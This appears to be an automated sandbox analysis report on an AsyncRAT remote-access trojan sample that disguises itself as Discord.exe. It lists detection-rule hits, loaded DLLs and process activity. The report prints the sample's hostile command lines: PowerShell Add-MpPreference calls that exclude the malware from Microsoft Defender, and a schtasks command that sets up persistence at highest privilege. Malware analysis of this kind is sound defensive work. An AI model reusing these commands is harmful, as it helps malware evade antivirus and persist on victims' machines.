Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Process information set: 01 00 00 00

                    System Summary

                    barindex
                    Source: s3OBQLA3xR.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0.0.s3OBQLA3xR.exe.860000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000000.00000002.2995661677.0000000012BB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000000.00000000.1684003889.0000000000862000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\Discord.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Code function: 0_2_00007FFD9B7E2361
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Code function: 0_2_00007FFD9B7E16E9
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Code function: 0_2_00007FFD9B7E6E42
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Code function: 0_2_00007FFD9B7E6096
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Code function: 0_2_00007FFD9B7EA918
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Code function: 0_2_00007FFD9B7E20C1
Source: C:\Users\user\AppData\Roaming\Discord.exe | Code function: 15_2_00007FFD9B7D16E9
Source: C:\Users\user\AppData\Roaming\Discord.exe | Code function: 15_2_00007FFD9B7D0E5E
Source: C:\Users\user\AppData\Roaming\Discord.exe | Code function: 15_2_00007FFD9B7D20C1
Source: C:\Users\user\AppData\Roaming\Discord.exe | Code function: 16_2_00007FFD9B7C16E9
Source: C:\Users\user\AppData\Roaming\Discord.exe | Code function: 16_2_00007FFD9B7C0E5E
Source: C:\Users\user\AppData\Roaming\Discord.exe | Code function: 16_2_00007FFD9B7C20C1
Source: C:\Users\user\AppData\Roaming\Discord.exe | Code function: 17_2_00007FFD9B8016E9
Source: C:\Users\user\AppData\Roaming\Discord.exe | Code function: 17_2_00007FFD9B800E5E
Source: C:\Users\user\AppData\Roaming\Discord.exe | Code function: 17_2_00007FFD9B8020C1
Source: C:\Users\user\AppData\Roaming\Discord.exe | Code function: 18_2_00007FFD9B7D16E9
Source: C:\Users\user\AppData\Roaming\Discord.exe | Code function: 18_2_00007FFD9B7D0E5E
Source: C:\Users\user\AppData\Roaming\Discord.exe | Code function: 18_2_00007FFD9B7D20C1
Source: C:\Users\user\AppData\Roaming\Discord.exe | Code function: 20_2_00007FFD9B7E16E9
Source: C:\Users\user\AppData\Roaming\Discord.exe | Code function: 20_2_00007FFD9B7E0E5E
Source: s3OBQLA3xR.exe, 00000000.00000002.2995661677.0000000012BB2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamediscord.exe0 vs s3OBQLA3xR.exe
Source: s3OBQLA3xR.exe, 00000000.00000000.1684003889.0000000000862000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamediscord.exe0 vs s3OBQLA3xR.exe
Source: s3OBQLA3xR.exe | Binary or memory string: OriginalFilenamediscord.exe0 vs s3OBQLA3xR.exe
Source: s3OBQLA3xR.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: s3OBQLA3xR.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.s3OBQLA3xR.exe.860000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2995661677.0000000012BB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1684003889.0000000000862000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\Discord.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: s3OBQLA3xR.exe, sobWCqEaS5.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: s3OBQLA3xR.exe, U9pHMOisPp.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: s3OBQLA3xR.exe, U9pHMOisPp.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Discord.exe.0.dr, sobWCqEaS5.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Discord.exe.0.dr, U9pHMOisPp.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Discord.exe.0.dr, U9pHMOisPp.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: s3OBQLA3xR.exe, 1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.cs | Base64 encoded string: 'N+J/cgk6Ux7/+LR5tyAA4QxisYq+V+KiybXR0C8o1/0ijtAO697n9uiUUeBx/JEW'
Source: Discord.exe.0.dr, 1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.cs | Base64 encoded string: 'N+J/cgk6Ux7/+LR5tyAA4QxisYq+V+KiybXR0C8o1/0ijtAO697n9uiUUeBx/JEW'
Source: Discord.exe.0.dr, GaULpswXIufzTGkabH57dWAWZLAY2FIFLB2IiUzoLOWVlY0Ba2R9rd92KzjGYDa6qNvw9fm4P8nngRNQQ9G.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Discord.exe.0.dr, GaULpswXIufzTGkabH57dWAWZLAY2FIFLB2IiUzoLOWVlY0Ba2R9rd92KzjGYDa6qNvw9fm4P8nngRNQQ9G.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: s3OBQLA3xR.exe, GaULpswXIufzTGkabH57dWAWZLAY2FIFLB2IiUzoLOWVlY0Ba2R9rd92KzjGYDa6qNvw9fm4P8nngRNQQ9G.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: s3OBQLA3xR.exe, GaULpswXIufzTGkabH57dWAWZLAY2FIFLB2IiUzoLOWVlY0Ba2R9rd92KzjGYDa6qNvw9fm4P8nngRNQQ9G.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.evad.winEXE@21/21@2/2
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | File created: C:\Users\user\AppData\Roaming\Discord.exe
Source: C:\Users\user\AppData\Roaming\Discord.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Mutant created: \Sessions\1\BaseNamedObjects\miQ2yTLyupQ9Eve0
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
Source: s3OBQLA3xR.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: s3OBQLA3xR.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: s3OBQLA3xR.exe | ReversingLabs: Detection: 76%
Source: s3OBQLA3xR.exe | Virustotal: Detection: 65%
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | File read: C:\Users\user\Desktop\s3OBQLA3xR.exe
Source: unknown | Process created: C:\Users\user\Desktop\s3OBQLA3xR.exe "C:\Users\user\Desktop\s3OBQLA3xR.exe"
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 's3OBQLA3xR.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Discord.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\user\AppData\Roaming\Discord.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Discord.exe C:\Users\user\AppData\Roaming\Discord.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Discord.exe C:\Users\user\AppData\Roaming\Discord.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Discord.exe "C:\Users\user\AppData\Roaming\Discord.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Discord.exe "C:\Users\user\AppData\Roaming\Discord.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Discord.exe C:\Users\user\AppData\Roaming\Discord.exe
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: sxs.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: avicap32.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe | Section loaded: winmm.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
